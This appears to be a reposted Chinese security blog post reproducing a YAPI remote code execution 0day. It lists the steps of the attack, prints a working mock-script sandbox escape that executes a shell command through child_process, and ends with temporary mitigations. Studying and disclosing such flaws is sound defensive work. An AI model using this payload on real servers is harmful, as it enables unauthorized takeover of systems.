YAPI远程代码执行0day漏洞复现

  • A+
所属分类:安全文章


        由于用户使用时未按照安全的方式对YAPI进行配置,攻击者可以使用 YAPI 的 Mock 功能在受影响的服务器上执行任意 javascript 代码,导致攻击者接管并控制服务器;目前该漏洞暂无补丁,处于0day状态。


YAPI远程代码执行0day漏洞复现


注册或者爆破获取用户登录权限登陆系统:

添加项目:

YAPI远程代码执行0day漏洞复现

 

 添加接口

YAPI远程代码执行0day漏洞复现


添加mock脚本:


const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("whoami").toString()


YAPI远程代码执行0day漏洞复现

预览里访问接口

YAPI远程代码执行0day漏洞复现

 

 YAPI远程代码执行0day漏洞复现

 


修复建议


       该漏洞官方暂未发布补丁,请受影响的用户实时关注官网以获取最新信息。链接如下:

https://github.com/YMFE/yapi


临时解决方案


        1.关闭YAPI注册功能

        2.删除恶意账户

        3.回滚服务器快照

        4.同步删除恶意mock脚本以防止二次攻击



























































凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数

本文始发于微信公众号(Khan安全攻防实验室):YAPI远程代码执行0day漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: